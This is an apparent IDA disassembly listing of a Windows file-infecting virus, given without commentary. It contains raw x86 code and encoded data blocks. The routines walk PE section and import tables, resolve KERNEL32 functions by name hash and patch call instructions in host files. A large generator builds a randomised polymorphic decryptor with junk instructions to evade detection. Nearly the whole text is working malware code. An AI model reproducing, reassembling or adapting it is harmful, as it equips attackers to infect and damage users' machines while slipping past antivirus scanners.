dd 101E77h, 418385C6h, 6A010010h, 6A016A00h, 4A95FF02h
dd 8300103Fh, 840FFFF8h, 160h, 73958D93h, 6A00101Eh, 0FF535210h
dd 103F3A95h, 0FC08500h, 14085h, 94BD8D00h, 0B100101Eh
dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h
dd 103EBEh, 1EA2BD8Dh, 1B10010h, 0FFFA1DE8h, 8F958DFFh
dd 6A00101Eh, 146800h, 53520000h, 3F4695FFh, 448D0010h
dd 958D1424h, 104324h, 0AB60F50h, 1424448Bh, 208E0C1h
dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h
dd 0FF102444h, 0BD8D5032h, 103F84h, 1CE8h, 362E2500h, 202E2078h
dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh
dd 95FF5700h, 103E76h, 0ACC481h, 6A0000h, 0FF535750h, 103F4695h
dd 988D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h
dd 95FF5700h, 103E76h, 500CC483h, 7680BEBh, 8D000000h
dd 101EA8BDh, 0FF535700h, 103F4695h, 7EC08500h, 84B58D54h
dd 8300103Fh, 101598A5h, 8D8D0000h, 104183h, 6ACE2Bh, 0FF535651h
dd 103F4295h, 0F88300h, 8B912F7Eh, 84B58DFEh, 0B000103Fh
dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 84BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h
dd 103F36h, 157FBD80h, 74010010h, 7530682Ah, 95FF0000h
dd 103EE6h, 4183BD80h, 74000010h, 7785C711h, 101Eh, 0C6000000h
dd 10418385h, 8E90000h, 0C7FFFFFEh, 10158885h, 0
dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
dd 656D6974h, 74492021h, 6C207327h, 21657461h, 10A61429h
dd 3AAB5957h, 4CA2A1A8h, 714BC3D4h, 7F95D1CAh, 0D8B8B352h
dd 1Ah dup(0)
; =============== S U B R O U T I N E =======================================
sub_48F414 proc near ; CODE XREF: sub_48F4CA:loc_48F4B8�p
; sub_48F51B+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+1042F4h], 0
and dword ptr [ebp+1042F8h], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_48F430: ; CODE XREF: sub_48F414+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_48F452
cmp eax, [edx+8]
jnb short loc_48F452
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+1042F4h], edx
mov [ebp+1042F8h], eax
jmp short loc_48F457
; ---------------------------------------------------------------------------
loc_48F452: ; CODE XREF: sub_48F414+23�j
; sub_48F414+28�j
add edx, 28h
loop loc_48F430
loc_48F457: ; CODE XREF: sub_48F414+3C�j
popa
retn 4
sub_48F414 endp
; ---------------------------------------------------------------------------
mov [ebp+102467h], al
call sub_48F4CA
push 20h
lea eax, [ebp+102394h]
pop ecx
loc_48F472: ; CODE XREF: fuck:0048F479�j
cmp [eax], ebx
jz short loc_48F482
add eax, 4
loop loc_48F472
inc dword ptr [ebp+1042D0h]
retn
; ---------------------------------------------------------------------------
loc_48F482: ; CODE XREF: fuck:0048F474�j
neg ecx
add ecx, [ebp+102467h]
jecxz short loc_48F49C
loc_48F48C: ; CODE XREF: fuck:0048F494�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_48F48C
mov [ebp+102394h], ebx
; START OF FUNCTION CHUNK FOR sub_48F4CA
loc_48F49C: ; CODE XREF: fuck:0048F48A�j
; sub_48F4CA+34�j
cmp dword ptr [edx], 0
jz short loc_48F4A6
sub esi, [edx]
add esi, [edx+10h]
loc_48F4A6: ; CODE XREF: sub_48F4CA-2B�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_48F4B5
push dword ptr [edx]
jmp short loc_48F4B8
; ---------------------------------------------------------------------------
loc_48F4B5: ; CODE XREF: sub_48F4CA-1B�j
push dword ptr [edx+10h]
loc_48F4B8: ; CODE XREF: sub_48F4CA-17�j
call sub_48F414
sub ecx, esi
sub ecx, [ebp+1042F8h]
pop eax
add ecx, [ebx+34h]
retn
; END OF FUNCTION CHUNK FOR sub_48F4CA
; =============== S U B R O U T I N E =======================================
sub_48F4CA proc near ; CODE XREF: fuck:0048F461�p
; FUNCTION CHUNK AT 0048F49C SIZE 0000002E BYTES
pop dword ptr [ebp+1042D4h]
mov dword ptr [ebp+1042D0h], 0
call sub_48F51B
mov eax, [ebp+1042D0h]
call near ptr dword_48EB50+43h
call sub_48F507
cmp dword ptr [ebp+1042D0h], 0
jnz short loc_48F500
mov [ebp+102410h], ebx
jmp short loc_48F49C
; ---------------------------------------------------------------------------
loc_48F500: ; CODE XREF: sub_48F4CA+2C�j
dec dword ptr [ebp+1042D0h]
retn
sub_48F4CA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_48F507 proc near ; CODE XREF: sub_48F4CA+20�p
pop dword ptr [ebp+1042D4h]
mov [ebp+1042D0h], edx
call sub_48F51B
xor ecx, ecx
retn
sub_48F507 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_48F51B proc near ; CODE XREF: sub_48F4CA+10�p
; sub_48F507+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_48F414
add edx, [ebp+1042F8h]
add edx, esi
loc_48F52F: ; CODE XREF: sub_48F51B+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_48F640
cmp dword ptr [edx+10h], 0
jz locret_48F640
mov eax, [edx+0Ch]
push eax
call sub_48F414
add eax, [ebp+1042F8h]
add eax, esi
push eax
loc_48F555: ; CODE XREF: sub_48F51B+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_48F575
cmp cl, 2Eh
jz short loc_48F564
loc_48F561: ; CODE XREF: sub_48F51B+58�j
inc eax
jmp short loc_48F555
; ---------------------------------------------------------------------------
loc_48F564: ; CODE XREF: sub_48F51B+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_48F561
loc_48F575: ; CODE XREF: sub_48F51B+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_48F638
cmp word ptr [eax-2], 3233h
jnz loc_48F638
push esi
cmp dword ptr [edx], 0
jnz short loc_48F598
mov ecx, [edx+10h]
jmp short loc_48F59A
; ---------------------------------------------------------------------------
loc_48F598: ; CODE XREF: sub_48F51B+76�j
mov ecx, [edx]
loc_48F59A: ; CODE XREF: sub_48F51B+7B�j
add esi, ecx
push ecx
call sub_48F414
add esi, [ebp+1042F8h]
loc_48F5A8: ; CODE XREF: sub_48F51B+90�j
; sub_48F51B+117�j
lodsd
test eax, eax
js short loc_48F5A8
jz loc_48F637
push dword ptr [ebp+1042F8h]
push eax
call sub_48F414
add eax, [ebp+1042F8h]
pop dword ptr [ebp+1042F8h]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_48F5D4: ; CODE XREF: sub_48F51B+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_48F5EB
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_48F5D4
; ---------------------------------------------------------------------------
loc_48F5EB: ; CODE XREF: sub_48F51B+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_48F631
cmp ebx, 0DB6E45A8h
jz short loc_48F631
cmp ebx, 0FFA13B59h
jz short loc_48F631
cmp ebx, 0ACB522D6h
jz short loc_48F631
cmp ebx, 0F358E993h
jz short loc_48F631
cmp ebx, 0F358E97Dh
jz short loc_48F631
cmp ebx, 0E1253F46h
jz short loc_48F631
cmp ebx, 0E1253F30h
jz short loc_48F631
call dword ptr [ebp+1042D4h]
loc_48F631: ; CODE XREF: sub_48F51B+D6�j
; sub_48F51B+DE�j ...
pop ebx
jmp loc_48F5A8
; ---------------------------------------------------------------------------
loc_48F637: ; CODE XREF: sub_48F51B+92�j
pop esi
loc_48F638: ; CODE XREF: sub_48F51B+60�j
; sub_48F51B+6C�j
add edx, 14h
jmp loc_48F52F
; ---------------------------------------------------------------------------
locret_48F640: ; CODE XREF: sub_48F51B+18�j
; sub_48F51B+22�j
retn
sub_48F51B endp
; ---------------------------------------------------------------------------
db 1, 6Ah, 4
dd 0F549E858h, 9588FFFFh, 102641h, 1831B866h, 0E4C0E202h
dd 66E20203h, 58066AABh, 0FFF52EE8h, 8C283FFh, 56AD187h
dd 0F521E858h, 0FA80FFFFh, 0B00B7303h, 41850250h, 0AA001026h
dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F501E811h, 1B8FFFFh
dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h
dd 0C3BFE2ABh, 39CC958Dh, 0D72B0010h, 0F7C3DAF7h, 1039C085h
dd 0
; ---------------------------------------------------------------------------
adc [edi], cl
xchg eax, ebp
rol cl, 0E0h
or esi, esi
test [esi+1001039h], edi
jnz short loc_48F6D6
or ax, 2589h
jmp short loc_48F6E9
; ---------------------------------------------------------------------------
loc_48F6D6: ; CODE XREF: fuck:0048F6CE�j
test byte ptr [ebp+1039BEh], 2
jnz short loc_48F6E5
or ax, 2531h
jmp short loc_48F6E9
; ---------------------------------------------------------------------------
loc_48F6E5: ; CODE XREF: fuck:0048F6DD�j
or ax, 2501h
loc_48F6E9: ; CODE XREF: fuck:0048F6D4�j
; fuck:0048F6E3�j
stosw
call near ptr dword_48F644+68h
mov eax, [ebx+34h]
mov [ebp+1042E8h], edx
stosd
retn
; =============== S U B R O U T I N E =======================================
sub_48F6FB proc near ; CODE XREF: fuck:0048FD47�p
test dword ptr [ebp+1039C0h], 10000000h
setnz al
add al, 0BCh
stosb
call near ptr dword_48F644+68h
mov [ebp+1042ECh], edx
test byte ptr [ebp+1039BEh], 1
jnz short loc_48F723
rdtsc
jmp short loc_48F725
; ---------------------------------------------------------------------------
loc_48F723: ; CODE XREF: sub_48F6FB+22�j
sub eax, eax
loc_48F725: ; CODE XREF: sub_48F6FB+26�j
stosd
retn
sub_48F6FB endp
; =============== S U B R O U T I N E =======================================
sub_48F727 proc near ; CODE XREF: fuck:loc_48FD51�p
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_48F75A
mov al, [ebp+1039BAh]
shl eax, 0Bh
or ax, 458Bh
stosw
mov al, 0F8h
stosb
mov al, [ebp+1039BAh]
shl eax, 1Bh
add eax, 6896467h
stosd
xor eax, eax
stosw
jmp short locret_48F76C
; ---------------------------------------------------------------------------
loc_48F75A: ; CODE XREF: sub_48F727+A�j
mov eax, 58F64h
stosd
mov al, [ebp+1039BAh]
add al, 58h
shl eax, 18h
stosd
locret_48F76C: ; CODE XREF: sub_48F727+31�j
retn
sub_48F727 endp
; =============== S U B R O U T I N E =======================================
sub_48F76D proc near ; CODE XREF: sub_48F7DF:loc_48F806�p
; sub_48F7DF+4C�p ...
mov byte ptr [ebp+10279Ch], 9
jmp short loc_48F79B
; ---------------------------------------------------------------------------
loc_48F776: ; CODE XREF: sub_48F76D+44�j
mov al, 0FCh
jmp short loc_48F79A
; ---------------------------------------------------------------------------
loc_48F77A: ; CODE XREF: sub_48F76D+48�j
mov ax, 0EBh
stosw
jmp short loc_48F79B
; ---------------------------------------------------------------------------
loc_48F782: ; CODE XREF: sub_48F76D+4C�j
push 4
pop eax
call near ptr dword_48EB50+43h
lea eax, [edx+edx*8]
shl eax, 8
add ax, 0C089h
stosw
jmp short loc_48F79B
; ---------------------------------------------------------------------------
loc_48F798: ; CODE XREF: sub_48F76D+50�j
mov al, 90h
loc_48F79A: ; CODE XREF: sub_48F76D+B�j
; sub_48F76D+60�j ...
stosb
loc_48F79B: ; CODE XREF: sub_48F76D+7�j
; sub_48F76D+13�j ...
push 0Fh
pop eax
call near ptr dword_48EB50+43h
add byte ptr [ebp+10279Ch], 6
cmp dl, 8
jnb short locret_48F7DE
test dl, dl
jz short loc_48F776
dec dl
jz short loc_48F77A
dec dl
jz short loc_48F782
dec dl
jz short loc_48F798
dec dl
jz short loc_48F7CF
dec dl
jz short loc_48F7D6
dec dl
jz short loc_48F7DA
mov al, 0F9h
jmp short loc_48F79A
; ---------------------------------------------------------------------------
loc_48F7CF: ; CODE XREF: sub_48F76D+54�j
mov al, 87h
stosb
mov al, 0DBh
jmp short loc_48F79A
; ---------------------------------------------------------------------------
loc_48F7D6: ; CODE XREF: sub_48F76D+58�j
mov al, 0F5h
jmp short loc_48F79A
; ---------------------------------------------------------------------------
loc_48F7DA: ; CODE XREF: sub_48F76D+5C�j
mov al, 0F8h
jmp short loc_48F79A
; ---------------------------------------------------------------------------
locret_48F7DE: ; CODE XREF: sub_48F76D+40�j
retn
sub_48F76D endp
; =============== S U B R O U T I N E =======================================
sub_48F7DF proc near ; CODE XREF: fuck:loc_48FC28�p
; fuck:0048FDDB�p
test dword ptr [ebp+1039C0h], 2000h
mov al, 86h
jnz short loc_48F7EF
add al, 4
loc_48F7EF: ; CODE XREF: sub_48F7DF+C�j
lea ecx, [edi-2]
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short loc_48F806
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_48F806: ; CODE XREF: sub_48F7DF+1E�j
call sub_48F76D
test dword ptr [ebp+1039C0h], 4000h
mov ax, 3166h
jnz short loc_48F81D
mov ah, 29h
loc_48F81D: ; CODE XREF: sub_48F7DF+3A�j
stosw
mov al, 18h
or al, [ebp+1039BAh]
shl al, 3
stosb
call sub_48F76D
mov al, 88h
test dword ptr [ebp+1039C0h], 8000h
jnz short loc_48F840
mov al, 86h
loc_48F840: ; CODE XREF: sub_48F7DF+5D�j
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short locret_48F854
mov al, 0
or byte ptr [edi-1], 40h
stosb
locret_48F854: ; CODE XREF: sub_48F7DF+6C�j
retn
sub_48F7DF endp
; ---------------------------------------------------------------------------
loc_48F855: ; CODE XREF: sub_49045B+183�p
lea edi, [ebp+1039CCh]
call sub_48F76D
test dword ptr [ebp+1039C0h], 400000h
jz short near ptr unk_48F86F
mov al, 60h
stosb
; ---------------------------------------------------------------------------
unk_48F86F db 0F7h ; ; CODE XREF: fuck:0048F86A�j
db 85h ;
db 0C0h ;
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
adc [edi+eax-48h], dh
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
db 2 dup(0), 2
dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042D8h, 0FFFECCE8h
dd 0AAE8B0FFh, 0DCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39C085F7h
dd 30010h, 1A740000h, 39C085F7h, 10h, 0A740200h, 0FFFE2EE8h
dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042D8h, 0C82BCF8Bh
dd 42E0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h
dd 1039C085h, 300h, 0F6137400h, 1039BE85h, 0A748000h, 0FFFDAAE8h
dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39C085F7h
dd 30010h, 5A740000h, 39BE85F6h, 75800010h, 0FD81E80Ah
dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh
dd 0FFB86639h, 91AB6615h, 0C0958BABh, 0F7001039h, 3C2F7D2h
dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh
dd 91AB6615h, 8BCF8BABh, 1042E085h, 89C82B00h, 85F7FC48h
dd 1039C0h, 3, 85F73874h, 1039C0h, 0C000000h, 85F72C74h
dd 1039C0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh
dd 39C085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh
dd 1039C0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh
dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039C0h
dd 8, 0BD807275h, 1039BEh, 0E8697400h, 0FFFFFD65h, 291829B8h
dd 0BAA50AC9h, 0C0001039h, 0A50A03E4h, 1039BAh, 0FD4BE8ABh
dd 0B1B0FFFFh, 0BE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh
dd 1039BAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h
dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0C085F759h, 10001039h
dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h
dd 0AAE8B0FFh, 89ABC033h, 1042C4BDh, 0C085F700h, 20001039h
dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039C085h, 0
dd 89187480h, 1042F0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh
dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039B8h
dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0C085F7C0h, 40001039h
dd 74000000h, 28C48003h, 39B8A50Ah, 0AB660010h, 42C8BD89h
dd 0F7AB0010h, 1039C085h, 0
; ---------------------------------------------------------------------------
inc eax
jnz short loc_48FB00
mov al, 50h
add al, [ebp+1039B8h]
stosb
loc_48FB00: ; CODE XREF: fuck:0048FAF5�j
test dword ptr [ebp+1039C0h], 80h
jnz short loc_48FB17
mov al, 0B8h
or al, [ebp+1039B9h]
stosb
jmp short loc_48FB54
; ---------------------------------------------------------------------------
loc_48FB17: ; CODE XREF: fuck:0048FB0A�j
mov ax, 1831h
test dword ptr [ebp+1039C0h], 100h
jz short loc_48FB29
mov al, 29h
loc_48FB29: ; CODE XREF: fuck:0048FB25�j
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
mov ax, 0F081h
test dword ptr [ebp+1039C0h], 200h
jnz short loc_48FB4C
mov ah, 0C8h
loc_48FB4C: ; CODE XREF: fuck:0048FB48�j
or ah, [ebp+1039B9h]
stosw
loc_48FB54: ; CODE XREF: fuck:0048FB15�j
mov [ebp+1042E4h], edi
mov eax, 29CCh
stosd
test dword ptr [ebp+1039C0h], 8
jz short loc_48FBDD
call sub_48F76D
test dword ptr [ebp+1039C0h], 400h
jnz short loc_48FB88
mov al, 0B8h
or al, [ebp+1039BAh]
stosb
jmp short loc_48FBD5
; ---------------------------------------------------------------------------
loc_48FB88: ; CODE XREF: fuck:0048FB7B�j
test dword ptr [ebp+1039C0h], 800h
jnz short loc_48FBA5
mov ax, 0E083h
or ah, [ebp+1039BAh]
stosw
xor eax, eax
stosb
jmp short loc_48FBBA
; ---------------------------------------------------------------------------
loc_48FBA5: ; CODE XREF: fuck:0048FB92�j
mov ax, 1829h
or ah, [ebp+1039BAh]
shl ah, 3
or ah, [ebp+1039BAh]
stosw
loc_48FBBA: ; CODE XREF: fuck:0048FBA3�j
test dword ptr [ebp+1039C0h], 1000h
mov ax, 0C081h
jz short loc_48FBCD
add ah, 8
loc_48FBCD: ; CODE XREF: fuck:0048FBC8�j
or ah, [ebp+1039BAh]
stosw
loc_48FBD5: ; CODE XREF: fuck:0048FB86�j
movzx eax, byte ptr [ebp+1039BEh]
stosd
loc_48FBDD: ; CODE XREF: fuck:0048FB6A�j
call sub_48F76D
test dword ptr [ebp+1039C0h], 40000000h
jz short loc_48FBFC
mov al, 50h
add al, [ebp+1039B8h]
stosb
call sub_48F76D
loc_48FBFC: ; CODE XREF: fuck:0048FBEC�j
lea ecx, [edi-2]
mov [ebp+1042CCh], ecx
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_48FC28
mov al, 0E8h
stosb
mov eax, [ebp+1042F0h]
sub eax, edi
sub eax, 4
stosd
mov [ebp+1042F0h], edi
jmp short loc_48FC2D
; ---------------------------------------------------------------------------
loc_48FC28: ; CODE XREF: fuck:0048FC0F�j
call sub_48F7DF
loc_48FC2D: ; CODE XREF: fuck:0048FC26�j
call sub_48F76D
test dword ptr [ebp+1039C0h], 10000h
jnz short loc_48FC49
mov al, 40h
or al, [ebp+1039B8h]
stosb
jmp short loc_48FC58
; ---------------------------------------------------------------------------
loc_48FC49: ; CODE XREF: fuck:0048FC3C�j
mov ax, 0C083h
or ah, [ebp+1039B8h]
stosw
mov al, 1
stosb
loc_48FC58: ; CODE XREF: fuck:0048FC47�j
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_48FC93
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_48FC8A
mov al, 0C0h
or al, [ebp+1039BAh]
mov ah, [ebp+1039BFh]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_48FC92
; ---------------------------------------------------------------------------
loc_48FC8A: ; CODE XREF: fuck:0048FC6E�j
mov al, 40h
or al, [ebp+1039BAh]
loc_48FC92: ; CODE XREF: fuck:0048FC88�j
stosb
loc_48FC93: ; CODE XREF: fuck:0048FC62�j
test dword ptr [ebp+1039C0h], 80000h
jnz short loc_48FCAF
mov ax, 0E883h
or ah, [ebp+1039B9h]
stosw
mov al, 1
jmp short loc_48FCB7
; ---------------------------------------------------------------------------
loc_48FCAF: ; CODE XREF: fuck:0048FC9D�j
mov al, 48h
or al, [ebp+1039B9h]
loc_48FCB7: ; CODE XREF: fuck:0048FCAD�j
stosb
call sub_48F76D
test dword ptr [ebp+1039C0h], 100000h
mov cl, 75h
jnz short loc_48FCF0
mov ax, 0F883h
or ah, [ebp+1039B9h]
stosw
xor eax, eax
stosb
sub [ebp+1042CCh], edi
test dword ptr [ebp+1039C0h], 200000h
jnz short loc_48FD0B
mov cl, 77h
jmp short loc_48FD0B
; ---------------------------------------------------------------------------
loc_48FCF0: ; CODE XREF: fuck:0048FCC9�j
mov ax, 1809h
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
sub [ebp+1042CCh], edi
loc_48FD0B: ; CODE XREF: fuck:0048FCEA�j
; fuck:0048FCEE�j
mov al, cl
mov ah, [ebp+1042CCh]
stosw
mov al, 58h
add al, [ebp+1039B8h]
stosb
call sub_48F76D
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_48FD5B
test dword ptr [ebp+1039C0h], 8000000h
jnz short loc_48FD5B
test dword ptr [ebp+1039C0h], 6000000h
jnz short loc_48FD51
call sub_48F6FB
call sub_48F76D
loc_48FD51: ; CODE XREF: fuck:0048FD45�j
call sub_48F727
call sub_48F76D
loc_48FD5B: ; CODE XREF: fuck:0048FD2D�j
; fuck:0048FD39�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_48FD6F
mov al, 0C9h
stosb
call sub_48F76D
loc_48FD6F: ; CODE XREF: fuck:0048FD65�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_48FDA5
mov al, 7
sub al, [ebp+1039B8h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+1039B8h]
shl ah, 3
add ah, 4
stosd
call sub_48F76D
mov al, 61h
stosb
call sub_48F76D
loc_48FDA5: ; CODE XREF: fuck:0048FD79�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
stosw
call sub_48F76D
test dword ptr [ebp+1039C0h], 20h
jz short loc_48FE31
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_48FDED
mov eax, edi
mov ecx, [ebp+1042F0h]
sub eax, ecx
mov [ecx-4], eax
call sub_48F7DF
call sub_48F76D
mov al, 0C3h
stosb
call sub_48F76D
loc_48FDED: ; CODE XREF: fuck:0048FDCC�j
mov eax, edi
mov ecx, [ebp+1042C4h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+1039B8h]
stosb
call sub_48F76D
test dword ptr [ebp+1039C0h], 800000h
jz short loc_48FE20
mov ax, 0C350h
or al, [ebp+1039B8h]
jmp short loc_48FE2A
; ---------------------------------------------------------------------------
loc_48FE20: ; CODE XREF: fuck:0048FE12�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
loc_48FE2A: ; CODE XREF: fuck:0048FE1E�j
stosw
call sub_48F76D
loc_48FE31: ; CODE XREF: fuck:0048FDC0�j
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_48FE9C
mov ecx, edi
mov eax, [ebp+1042DCh]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+1039C0h], 1000000h
jnz short loc_48FE66
lea eax, [ebp+1039B8h]
loc_48FE5E: ; CODE XREF: fuck:0048FE64�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_48FE5E
loc_48FE66: ; CODE XREF: fuck:0048FE56�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_48FE7B
mov ax, 0C031h
stosw
loc_48FE7B: ; CODE XREF: fuck:0048FE73�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_48FE94
mov ax, 0C031h
stosw
loc_48FE94: ; CODE XREF: fuck:0048FE8C�j
mov al, 0C3h
stosb
call sub_48F76D
loc_48FE9C: ; CODE XREF: fuck:0048FE3B�j
lea eax, [ebp+1039CCh]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_48FEB4
push edi
sub edi, eax
pop eax
jmp short loc_48FECD
; ---------------------------------------------------------------------------
loc_48FEB4: ; CODE XREF: fuck:0048FEAC�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_48FECD: ; CODE XREF: fuck:0048FEB2�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_48FEED
neg eax
loc_48FEED: ; CODE XREF: fuck:0048FEE9�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_48FEF1 proc near ; CODE XREF: sub_49045B+336�p
push esi
push edi
cmp dword ptr [ebp+104300h], 0
jz loc_4900D9
call near ptr loc_48FF11+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_48FF11: ; CODE XREF: sub_48FEF1+F�p
add bh, bh
sub_48FEF1 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
mov [ebp+104314h], eax
push ebx
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_48F414
mov edx, [ebp+1042F4h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+104318h], eax
add eax, [edx+8]
mov [ebp+10431Ch], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_48F414
mov edi, [ebp+1042F4h]
push esi
call sub_48F414
mov edx, [ebp+1042F4h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_4900D9
jz loc_4900D9
add esi, [ebp+1042F8h]
add esi, [ebp+1042B4h]
; START OF FUNCTION CHUNK FOR sub_4900AA
loc_48FF8B: ; CODE XREF: sub_4900AA+29�j
lodsb
cmp al, 0E8h
jnz loc_490036
lea eax, [esi+4]
sub eax, [ebp+1042B4h]
add eax, [esi]
push eax
call sub_48F414
cmp dword ptr [ebp+1042F4h], 0
jnz short loc_48FFB9
cmp eax, [edi+0Ch]
jnb loc_4900D2
jmp short loc_48FFC5
; ---------------------------------------------------------------------------
loc_48FFB9: ; CODE XREF: sub_4900AA-FE�j
cmp [ebp+1042F4h], edx
jnz loc_4900D2
loc_48FFC5: ; CODE XREF: sub_4900AA-F3�j
add eax, [ebp+1042B4h]
cmp word ptr [eax], 25FFh
jnz loc_4900D2
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_48F414
cmp [ebp+1042F4h], edi
jnz loc_4900D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_4900D2
cmp eax, [edi+8]
jnb loc_4900D2
loc_49000E: ; CODE XREF: sub_4900AA+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042B4h]
push edx
push eax
push dword ptr [ebp+104314h]
call dword ptr [ebp+103E6Eh]
pop edx
test eax, eax
jnz loc_4900E8
jmp loc_4900D2
; ---------------------------------------------------------------------------
loc_490036: ; CODE XREF: sub_4900AA-11C�j
cmp al, 0FFh
jnz loc_4900D2
cmp byte ptr [esi], 15h
jnz loc_4900D2
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_48F414
